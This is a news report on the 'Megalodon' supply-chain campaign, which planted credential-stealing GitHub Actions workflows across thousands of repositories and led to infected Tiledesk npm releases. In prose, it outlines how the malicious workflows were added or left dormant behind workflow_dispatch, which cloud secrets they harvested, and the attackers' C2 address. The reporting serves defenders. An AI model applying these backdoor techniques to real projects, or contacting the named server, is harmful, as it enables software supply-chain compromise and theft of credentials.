Cybersecurity firm SafeDep discovered a massive automated attack on the software platform GitHub, targeting 5,561 repositories (software storage locations). Named Megalodon, the campaign pushed 5,718 fake code updates in a short six-hour window on the 18th of May 2026. SafeDep discovered Megalodon using its digital scanning tool, Malysis, which noticed hidden malicious scripts buried inside otherwise clean files.
The hackers used fake GitHub accounts with random eight-character names to hide their tracks, and even changed their system settings to appear official automated services, using fake sender identities like build-bot, auto-ci, ci-bot, and pipeline-bot.
The attack occurred around the same time TeamPCP hackers announced they had compromised a GitHub employee’s device and breached 3,800 repositories through a malicious VS Code extension, showing that developers are actively being targeted.
Hidden Backdoors in System Files
According to SafeDep’s blog post, the attackers used two main automated code techniques, one of which is a broad version called SysDiag. It adds a new file named .github/workflows/ci.yml that triggers a data-stealing script every time a developer updates their project.
Conversely, the second method is sneakier, called Optimize-Build. It replaces existing system files and uses a command called workflow_dispatch to keep the malicious code dormant, preventing failed build alerts or red flags. The hackers can wake up this backdoor at any time by sending a message through the GitHub API.
The popular live chat and chatbot service, Tiledesk, was a major victim of this attack. Hackers, reportedly, compromised nine of Tiledesk’s code areas on GitHub. And, since the main developer didn’t realize their files were poisoned, they unintentionally published seven infected versions of their product, called @tiledesk/tiledesk-server (versions 2.18.6 through 2.18.12), to the public npm package registry between 19 May and 21 May 2026.
A Hunt for Private Cloud Keys
Once run, this hidden script opens a terminal window and executes a decoded 111-line background program, and then copies internal files and data, which is sent to a hacker-controlled C2 server at 216.126.225.129:8443.
The malware steals credentials from major cloud systems like Amazon Web Services, Google Cloud, and Microsoft Azure, and searches for system logs, digital history, and code files to find 30 types of private passwords, database links, and secret digital keys.
According to SafeDep, the worst outcome is that hackers can steal special verification tokens to “impersonate the GitHub Actions workflow.” This lets the hackers trick linked cloud environments into thinking they are legitimate users.
SafeDep urges any developers who saw strange code updates from emails like build-[email protected] or [email protected] on 18 May to undo the changes and change all their cloud passwords immediately.
